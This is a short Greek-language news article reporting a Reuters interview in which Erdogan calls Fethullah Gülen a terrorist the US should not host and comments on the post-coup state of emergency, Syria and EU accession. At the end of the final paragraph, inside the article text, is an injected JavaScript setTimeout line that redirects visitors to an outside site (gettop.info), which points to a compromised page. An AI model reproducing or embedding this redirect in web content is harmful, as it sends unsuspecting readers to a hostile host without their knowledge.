Ερντογάν προς ΗΠΑ για Γκιουλέν: Φιλοξενείτε έναν τρομοκράτη

0
6

 

Στο πλαίσιο της Συνόδου Κορυφής του ΟΗΕ στη Νέα Υόρκη, ο Τούρκος πρόεδρος Ταγίπ Ερντογάν παραχώρησε συνέντευξή στο Reuters όπου επανέλαβε τις θέσεις και την επίθεσή του κατά του αντιπάλου του Φετουλάχ Γκιουλέν. Μάλιστα, καταφέρθηκε κι εναντίον των ΗΠΑ τον΄ζιοντας πως οι Ηνωμένες Πολιτείες δεν θα πρέπει «να φιλοξενούν έναν τρομοκράτη» όπως τον Γκιουλέν και ότι η δράση του θα πρέπει να απαγορεύεται παγκοσμίως, καθώς τον θεωρεί υπεύθυνο για το πραξικόπημα της 15ης Ιουλίου.

Ο Ερντογάν δήλωσε επίσης πως η κατάσταση έκτακτης ανάγκης που επιβλήθηκε μετά το πραξικόπημα μπορεί να παραταθεί από το κοινοβούλιο.

Σχετικά με τη Συρία, ο Ερντογάν είπε ότι ο Σύρος πρόεδρος Μπασάρ αλ Άσαντ δεν θα πρέπει να αποτελέσει μέλος μιας μεταβατικής κυβέρνησης και ότι η εδαφική ακεραιότητα της Συρίας θα πρέπει να τύχει σεβασμού από τις άλλες χώρες.

Όσον αφορά στην Ευρωπαϊκή Ένωση και τις σχέσεις με τη χώρα του, ο Ερντογάν δήλωσε πως «η Τουρκία έχει εκπληρώσει τις δεσμεύσεις της σχετικά με την διαδικασία ένταξης στην ΕΕ. Και το αντίθετο πρέπει να συμβεί όμως, και να εκπληρώσει τις δεσμεύσεις της και η ΕΕ. Δεν έχουμε ολοκληρώσει τη διαδικασία αυτή. Θέλουμε η ΕΕ να είναι ειλικρινής για τη διαδικασία αυτή». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here